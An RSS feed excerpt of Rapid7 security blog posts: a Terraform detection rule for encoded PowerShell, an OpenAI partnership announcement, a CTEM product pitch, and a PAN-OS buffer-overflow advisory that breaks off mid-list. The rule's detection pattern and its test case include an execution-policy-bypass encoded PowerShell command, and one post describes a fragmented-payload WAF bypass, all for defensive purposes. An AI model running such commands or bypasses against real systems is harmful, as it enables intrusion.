undefined;'><strong>Rapid7’s Terraform provider</strong></span><span style='font-size: undefined;'>. It offers a practical view of how detection engineering teams can use Detection as Code in practice:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="json">resource "rapid7_siem_detection_rule" "encoded_powershell" {
  name        = "Encoded PowerShell Command Execution"
description = "Detects PowerShell launched with base64-encoded commands"
techniques  = ["T1059.001"]
  action   = "CREATES_ALERTS"
priority = "HIGH"
logic = {
    leql = &lt;&lt;-LEQL
      from(event_type = process_start_event)
      where(
        (process.exe_path = /.*\\powershell\.exe$/i
         OR process.exe_path = /.*\\pwsh\.exe$/i)
        AND process.cmd_line ICONTAINS " -e"
AND process.cmd_line ICONTAINS-ANY [
" JAB", " SUVYI", " SQBFAFgA", " aWV4I"
]
      )
    LEQL
    testcases = [
      {
        matches = true
        payload = jsonencode({
          process = {
            exe_path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
cmd_line = "powershell.exe -ep bypass -e JABjAGwAaQBlAG4AdAA="
}
        })
      },
      {
        matches = false
        payload = jsonencode({
          process = {
            exe_path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
cmd_line = "powershell.exe -File C:\\Scripts\\backup.ps1"
}
        })
      }
    ]
  }
}</pre><h3><span style='font-size: undefined;'>Why this works:</span></h3><ol><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Version-controlled logic:</strong></span><span style='font-size: undefined;'> The LEQL query defines the threat logic in a text format that Git can track.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>MITRE ATT&CK</strong></span><span style='font-size: undefined;'><sup>®</sup></span><span style='font-size: undefined;'><strong> untegration:</strong></span><span style='font-size: undefined;'> The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>techniques</span></span><span style='font-size: undefined;'> field ensures your coverage map updates automatically.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Inline testing:</strong></span><span style='font-size: undefined;'> We aren't just deploying a query, but a </span><span style='font-size: undefined;'><strong>validated unit of logic</strong></span><span style='font-size: undefined;'>. The pipeline won't let this reach production if the logic fails to fire on the matching" payload or accidentally fires on the un-matching payload.</span></p></li></ol><h2>Why Terraform?</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Because it's the industry standard for managing infrastructure as code. We didn't invent a proprietary CLI; we built on the tool that thousands of platform teams already run daily. If your organization uses Terraform for cloud infrastructure, your detection engineers now use the same tool, the same workflow, and the same review process.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Governance happens naturally in this model.</strong></span><span style='font-size: undefined;'> Open a pull request. Your team sees the logic, the test cases, and the expected behavior. They comment, suggest improvements, and approve. Every change is traceable in your commit history. This isn't a separate compliance exercise bolted onto your workflow. It is the workflow.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Already have rules built in the UI? One command imports them all:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="json">terraform query -generate-config-out imports.tf</pre><h2>AI-assisted detection writing</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The quick-start repo ships with IDE configurations for </span><span style='font-size: undefined;'><strong>Claude Code, Cursor, VS Code Copilot, and Kiro</strong></span><span style='font-size: undefined;'>. These configs give your AI assistant full context on the Terraform provider schema, LEQL syntax, and MITRE ATT&CK mappings.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In practice: open your editor, describe a threat in plain English, such as ‘write me a detection for lateral movement via RDP from non-admin workstations,’ and get back a complete Terraform resource ready for review. The AI accelerates the engineer; it doesn't replace them. The time from "I need a detection" to "this is ready for review" drops from hours to minutes.</span></p><h2 style="direction: ltr;">Start building detections as code today</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s Terraform provider for Detection as Code is now available across all Incident Command and InsightIDR tiers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To get to work, use the </span><a href="https://docs.rapid7.com/insightidr/detections-as-code/" target="_blank"><span style='font-size: undefined;'>Getting Started guide</span></a><span style='font-size: undefined;'> for a walkthrough as you setup, authenticate, and run your first deployment. Clone the quick-start template, run </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>terraform plan</span></span><span style='font-size: undefined;'>, and see your detection estate as code.</span><br/><span style='font-size: undefined;'>For more information on Incident Command, visit </span><a href="/products/siem" target="_self"><span style='font-size: undefined;'>Our hub page for SIEM.</span></a></p>]]></description>
      <link>https://www.rapid7.com/blog/post/dr-scaling-engineering-detection-as-code</link>
      <guid isPermaLink="false">blt10dd1afa443b4b7e</guid>
      <category><![CDATA[Detection and Response]]></category><dc:creator><![CDATA[Zachary Zeid]]></dc:creator>
      <pubDate>Fri, 08 May 2026 12:37:21 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3cc8c945f314ec1f/68b9a045a7d14357b3ba893b/blog-hero-texture-lines.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 and OpenAI: Helping Defenders Move at Machine Speed]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'><em>Wade Woolwine is Senior Director, Product Security at Rapid7.</em></span></p><h2><span style='font-size: undefined;'>Announcing OpenAI's Trusted Access for Cyber program</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>CIOs and CISOs are telling us the same thing in different ways: Advances in frontier AI are accelerating the threat environment and putting pressure on security operating models built for a different pace. Vulnerabilities can be discovered faster, exploitation windows are shrinking, and attackers are increasingly using automation to move with greater speed and scale. For defenders, this changes the value equation. The premium is no longer only on detecting threats faster after they emerge, but on moving earlier: Reducing exposure, validating risk, strengthening detection, and remediating at scale before attackers can take advantage.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is why Rapid7 is excited to be included in OpenAI’s Trusted Access for Cyber program and their </span><a href="https://openai.com/index/gpt-5-5-with-trusted-access-for-cyber/" target="_blank"><span style='font-size: undefined;'>announcement</span></a><span style='font-size: undefined;'> today. OpenAI’s approach recognizes that advanced AI can help verified security teams move faster on legitimate defensive work, from triage and detection to validation, patching, malware analysis, and detection engineering. It also recognizes that some specialized cyber workflows require stronger verification, monitoring, and feedback loops.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As Corey Thomas, CEO of Rapid7, shared:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em>“Security leaders are under pressure from every direction: More vulnerabilities, faster exploitation, and increasing business pressure. Through OpenAI’s Trusted Access for Cyber program, Rapid7 is exploring more ways to accelerate the shift from reactive to preemptive security. To stay ahead of attackers, defenders must proactively reduce exploitability and detect with machine-scale speed and precision. We’re working with OpenAI to equip security teams with advanced capabilities that will meaningfully improve their cyber resilience.”</em></span></p><h2><span style='font-size: undefined;'>AI in security: Not just faster discovery</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>For Rapid7, this moment is about more than faster vulnerability discovery. AI is creating new pressure across the entire security lifecycle, from vulnerability validation, prioritization, disclosure, and remediation to threat and exploitation detection. Security infrastructure built for human-speed discovery now needs to operate in a machine-speed world, with enough context, governance, and accountability to help defenders act with confidence.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Finding risk is only the beginning. Security teams need to understand which vulnerabilities and misconfigurations are truly exploitable, which systems and business services are affected, what compensating controls are in place, how remediation should be prioritized, and where detection coverage is needed. CISOs also need confidence that advanced AI is being applied responsibly, with clear guardrails, measurable outcomes, and accountability.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our work with OpenAI will help us explore how frontier AI can strengthen three critical areas. First, it can support the identification of vulnerabilities in our own products and code earlier in the development lifecycle. By accelerating secure code review, surfacing risky patterns, supporting root cause analysis, reviewing patches, and giving engineering teams faster feedback, AI can help reduce risk before issues reach production.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Second, it can advance vulnerability research and exploitation analysis. Rapid7 has long-standing expertise in vulnerability intelligence, exploitability research, and offensive security with </span><a href="/research" target="_self"><span style='font-size: undefined;'>Rapid7 Labs</span></a><span style='font-size: undefined;'>. Frontier AI can help researchers reason across unfamiliar code, map affected surfaces, build safe reproduction harnesses, validate severity, and turn findings into practical remediation guidance.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Third, it can expand AI-driven red-teaming. As AI becomes more embedded in enterprise systems and security operations, it must also be tested adversarially. We see an opportunity to use AI to strengthen red-team workflows, explore attack paths, validate controls, and help defenders understand where exposure could become real-world risk.</span></p><h2><span style='font-size: undefined;'>Artificial intelligence in use at Rapid7</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>We are already seeing this potential inside our own security operations work. In support of our Agentic SOC initiatives, Rapid7 has designed and implemented a system that uses machine learning to surface threat- and risk-relevant events from raw log and telemetry data. By using frontier AI models, including OpenAI’s GPT-5.5, to support initial triage and escalate only relevant events to SOC analysts, we have seen a 25% reduction in time spent chasing false-positive events in the queue.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is not about replacing human expertise. It is about giving defenders better leverage in a world where attackers, businesses, and technology are all moving faster. The shift from reactive to preemptive security, and from human-scale processes to machine-scale defense, is not a marketing reframe. It is becoming the only viable path for teams that need to anticipate where attackers will move next, prioritize the exposures that actually matter, and respond at the speed of modern attacks.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>AI may accelerate discovery, but cyber</span><span style='color:rgb(68, 71, 70);font-size: undefined;'> </span><span style='font-size: undefined;'>resilience depends on what happens after discovery. Customers need to unify their data, apply AI with the right context, drive remediation at scale, and translate security activity into measurable outcomes. That is where Rapid7 is focused. Across the </span><a href="/platform" target="_self"><span style='font-size: undefined;'>Command Platform</span></a><span style='font-size: undefined;'>, Rapid7’s AI capabilities are built to help security teams detect threats and anomalies at scale, reduce noise, optimize SOC workflows, and make faster, more confident decisions.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By unifying Exposure Management and Detection and Response on the Command Platform, and combining AI-driven operations with the depth of expertise we have built over 25 years, Rapid7 is giving customers a more coherent way to reduce risk, disrupt attackers, and build durable cyber resilience. </span><span style='font-size: undefined;'><strong>Learn more about </strong></span><a href="/platform/artificial-intelligence-features/" target="_self"><span style='font-size: undefined;'><strong>Rapid7’s AI capabilities.</strong></span></a><span style='color:rgb(17, 85, 204);font-size: undefined;'><u><strong></strong></u></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/ai-rapid7-openai-helping-defenders-move-at-machine-speed</link>
      <guid isPermaLink="false">blt1decce19dc9920e2</guid>
      <category><![CDATA[Artificial Intelligence]]></category><dc:creator><![CDATA[Wade Woolwine]]></dc:creator>
      <pubDate>Thu, 07 May 2026 20:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0b0762ca94c50b0b/6846a711eac0e395093e52e3/AI.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Why Security in 2026 Requires Continuous Threat and Exposure Management (CTEM) at Scale]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Let's be honest, the patching window just shrank to something no practitioner or organization can keep up with. Organizations now need to operate in an environment that must assume breach, which means fundamentals like attack surface management, micro-segmentation, identity management, and attack path validation – aka a few core pillars of CTEM – just became the most important initiatives within the cybersecurity department. Rapid7 is the only vendor that provides a truly unified platform to master </span><span style='font-size: undefined;'><strong>Continuous Threat Exposure Management (CTEM)</strong></span><span style='font-size: undefined;'>.</span></p><h2>How Rapid7 satisfies all 5 steps of the CTEM Framework</h2><h3><span style='font-size: undefined;'>Steps 1 and 2: Scoping and Discovery</span></h3><h4><span style='font-size: undefined;'><em>Achieving full visibility</em></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 eliminates "unknown unknowns" by providing line-of-sight into 100% of your hybrid attack surface.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Surface Command (CAASM):</strong></span><span style='font-size: undefined;'> We establish a single source of truth by unifying asset and identity inventory from over 200 third-party vendors and native sources.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Vulnerability Management:</strong></span><span style='font-size: undefined;'> Our full-stack active scanning discovers shadow IT hidden within your enterprise network.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>External Attack Surface Management (EASM):</strong></span><span style='font-size: undefined;'> We scan the entire IPv4 space of the internet to automatically track changes to registered domains and public networks so you can map your external kingdom.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Unified CNAPP (Cloud Security):</strong></span><span style='font-size: undefined;'> Our platform provides real-time, agentless visibility into every resource running across your multi-cloud environment (AWS, Azure, GCP, and Kubernetes). Through </span><span style='font-size: undefined;'><strong>Event-Driven Harvesting (EDH)</strong></span><span style='font-size: undefined;'>, we identify infrastructure changes in under 60 seconds. This allows us to map not just the assets, but the complex identities and permissions that define your cloud risk.</span></p></li></ul><h3><span style='font-size: undefined;'>Step 3: Prioritization</span></h3><h4><span style='font-size: undefined;'><em>Moving beyond static scores</em></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>We replace generic risk scores with </span><span style='font-size: undefined;'><strong>Active Risk</strong></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><strong>Threat-Aware Context</strong></span><span style='font-size: undefined;'>. Our platform automatically prioritizes vulnerabilities based on real-world exploitability data from Rapid7 Labs and the Exploit Prediction Scoring System (EPSS). We are also able to incorporate your own organization’s tagging infrastructure to properly contextualize your enterprise so you focus on what matters most. </span></p><h3><span style='font-size: undefined;'>Step 4: Validation </span></h3><h4><span style='font-size: undefined;'><em>Continuous human-led red teaming </em></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>This is where Rapid7 truly stands apart from automated-only vendors or point-in-time pen tests. </span><span style='font-size: undefined;'><strong>Vector Command</strong></span><span style='font-size: undefined;'> provides the expert human logic needed to bypass compensating controls like WAFs that stop automated tools cold. This gives Rapid7 the ability to answer the question: “How would an attacker get in?” We fully map the attack chain from the external to the internal so you have insight into where your controls are weakest. </span><br/><span style='font-size: undefined;'>Ed Montgomery at Rapid7 has written extensively about the power of Vector Command – you can </span><a href="https://www.rapid7.com/blog/author/ed-montgomery/"><span style='font-size: undefined;'>find his blogs here</span></a><span style='font-size: undefined;'>.</span><br/><span style='font-size: undefined;'>Here’s a sampling of a couple of those stories: </span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>The Telerik UI Example:</strong></span><span style='font-size: undefined;'> While a scanner flags an old version of Telerik, our operators discovered they could bypass a WAF by splitting a malicious payload into 118 individual, "harmless" fragments. We bypassed the WAF and this achieved full remote code execution that a time-boxed, two-week pentest would never have uncovered. An automated scan might have flagged the outdated telerik as something notable but it was really the configuration of the WAF that allowed us to bypass. Something an automated scan would never have found. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>SaaS Phishing:</strong></span><span style='font-size: undefined;'> Our team used a misconfigured public Jira instance that allowed self-registration to hijack an Office 365 session and move laterally through internal trust. This validated that the true risk was a SaaS misconfiguration, not a patchable CVE.</span></p></li></ul><h3><span style='font-size: undefined;'>Step 5: Mobilization</span></h3><h4><span style='font-size: undefined;'><em>Instant response and remediation </em></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>We don't just find problems; we close the loop with integrated action.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Cloud Runtime Security (CADR):</strong></span><span style='font-size: undefined;'> Powered by our partnership with ARMO, our eBPF-based sensor can shut down an attack in seconds by killing malicious processes or pausing containers at the moment of detection.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Automation (SOAR):</strong></span><span style='font-size: undefined;'> InsightConnect and our "Bot Factory" in CNAPP trigger automated remediation workflows to lock down S3 buckets or disable compromised users instantly.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Remediation Hub:</strong></span><span style='font-size: undefined;'> We provide a centralized, vendor agnostic action-driven list of prioritized fixes to coordinate seamlessly with IT teams.</span></p></li></ul><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5c2b5dd1632091e5/69fc8ed12ed9e9ec383d94c0/CTEM-rapid7-framework.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="CTEM-rapid7-framework.png" asset-alt="CTEM-rapid7-framework.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5c2b5dd1632091e5/69fc8ed12ed9e9ec383d94c0/CTEM-rapid7-framework.png" data-sys-asset-uid="blt5c2b5dd1632091e5" data-sys-asset-filename="CTEM-rapid7-framework.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="CTEM-rapid7-framework.png" sys-style-type="display"/></figure><h2><span style='font-size: undefined;'>The new standard: From weeks to minutes</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>If your CTEM strategy relies on static tools and annual checkboxes, you are not just behind the curve. You are operating in a completely different era. By unifying the full visibility of Surface Command with the critical thinking of Vector Command and the instant response of our Cloud Runtime capabilities, Rapid7 empowers you to take command of your attack surface.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Do not wait for a 118 single bit request bypass to prove your defenses are porous. Move from a posture of passive observation to one of </span><a href="/products/command/exposure-management" target="_self"><span style='font-size: undefined;'>preemptive security</span></a><span style='font-size: undefined;'>.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-2026-cybersecurity-requires-ctem-at-scale</link>
      <guid isPermaLink="false">blt34d993a1bcdf5598</guid>
      <category><![CDATA[Exposure Command]]></category><dc:creator><![CDATA[James Davis]]></dc:creator>
      <pubDate>Thu, 07 May 2026 13:00:10 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Overview</span></h2><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>On May 6, 2026, Palo Alto Networks published a </span><a href="https://security.paloaltonetworks.com/CVE-2026-0300"><span style='font-size: undefined;'>security advisory</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-0300"><span style='font-size: undefined;'>CVE-2026-0300</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'>, a critical unauthenticated buffer overflow vulnerability affecting PAN-OS PA-Series and VM-Series firewall appliances. Prisma Access, Cloud NGFW, and Panorama appliances are not affected by this vulnerability. The vulnerability carries a CVSSv4 score of </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:A/AU:Y/R:U/V:C/RE:M/U:Red"><span style='font-size: undefined;'>9.3</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> and has been confirmed as exploited in the wild by the vendor.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>CVE-2026-0300 is a buffer overflow (</span><a href="https://cwe.mitre.org/data/definitions/787"><span style='font-size: undefined;'>CWE-787</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'>) in the User-ID™ Authentication Portal (also known as Captive Portal), a non-default PAN-OS feature used to map IP addresses to usernames. An unauthenticated remote attacker can exploit this vulnerability by sending specially crafted packets to a device with the Authentication Portal enabled, achieving arbitrary code execution with root privileges on the affected firewall. No authentication or user interaction is required.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Palo Alto Networks has confirmed limited exploitation in the wild targeting Authentication Portals exposed to either untrusted IP addresses or the public internet. No patches are currently available; fixed versions are expected to begin rolling out on May 13, 2026, with additional releases through May 28, 2026.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>PAN-OS is among the most widely deployed enterprise firewall operating systems in the world. Shodan </span><a href="https://www.shodan.io/search?query=os%3A%22PAN-OS%22"><span style='font-size: undefined;'>identifies</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> approximately 225,000 internet-facing PAN-OS instances, representing a significant attack surface. Rapid7 strongly urges all organizations running affected PAN-OS versions with the User-ID Authentication Portal enabled to </span><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>apply the available workarounds immediately</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'> and prioritize patching as soon as fixed versions become available.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><em>Update #1:</em></span><span style='color:rgb(31, 31, 31);font-size: undefined;'> On May 6, 2026, CVE-2026-0300 was </span><a href="https://www.cisa.gov/news-events/alerts/2026/05/06/cisa-adds-one-known-exploited-vulnerability-catalog"><span style='font-size: undefined;'>added</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation. Palo Alto Networks Unit 42 also </span><a href="https://unit42.paloaltonetworks.com/captive-portal-zero-day/"><span style='font-size: undefined;'>published</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> a threat brief attributing observed exploitation to CL-STA-1132, a likely state-sponsored threat cluster that deployed open-source tunneling tools and conducted Active Directory enumeration following initial compromise.</span></p><h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Mitigation guidance</span></h2><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Organizations running PA-Series and VM-Series firewalls with the User-ID™ Authentication Portal enabled should apply the available workarounds immediately and prioritize patching as soon as fixed versions are released. Check the official </span><a href="https://docs.paloaltonetworks.com/ngfw/administration/user-id/map-ip-addresses-to-users/map-ip-addresses-to-usernames-using-captive-portal/configure-captive-portal"><span style='font-size: undefined;'>documentation</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> to establish whether the affected User-ID™ Authentication Portal is currently enabled.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>According to the Palo Alto Networks advisory, the following versions are affected by CVE-2026-0300:</span></p><p></p><table><colgroup data-width='1000'><col style="width:30.769230769230766%"/><col style="width:24.85207100591716%"/><col style="width:29.585798816568047%"/><col style="width:14.792899408284024%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Product</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Unaffected</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Fix ETA</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 12.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 10.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p></td></tr></tbody></table><p></p><p>As of May 13, 2026, the first round of patches has been published. Until the remaining awaited patches are available, Palo Alto Networks recommends one of the following workarounds:</p><ul><li style="direction: ltr;"><p 